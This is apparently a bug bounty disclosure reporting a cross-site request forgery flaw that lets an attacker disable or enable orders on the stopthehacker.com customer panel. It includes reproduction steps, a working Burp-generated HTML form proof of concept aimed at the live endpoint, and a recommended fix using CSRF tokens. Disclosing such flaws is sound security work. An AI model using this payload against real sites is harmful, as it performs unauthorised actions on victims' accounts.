CSRF - Disabling orders at https://panel.stopthehacker.com/manage/disable-order/order/ID

Hi there, there's a CSRF which would allow an attacker to disable an order. Host: https://panel.stopthehacker.com #Steps to reproduce: - 1. Login to the panel. - 2. Subscribe/order a new scan - 3. Go to the Billing page and get the order ID - 4. Put the order id in the PoC below and submit it - 5. The order will be disabled now. - 6. Same procedure should work for enabling a service. An attacker would need to guess the order ID by sending some (a lot of) requests. #PoC: ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://panel.stopthehacker.com/manage/disable-order/order/240720" method="POST"> <input type="hidden" name="reason" value="Other" /> <input type="hidden" name="otherReason" value="&#45;" /> <input type="hidden" name="submit" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` You may need to adjust your order ID in the url. #How to fix? Add a CSRF token and validate it on the server. Thanks, Sebastian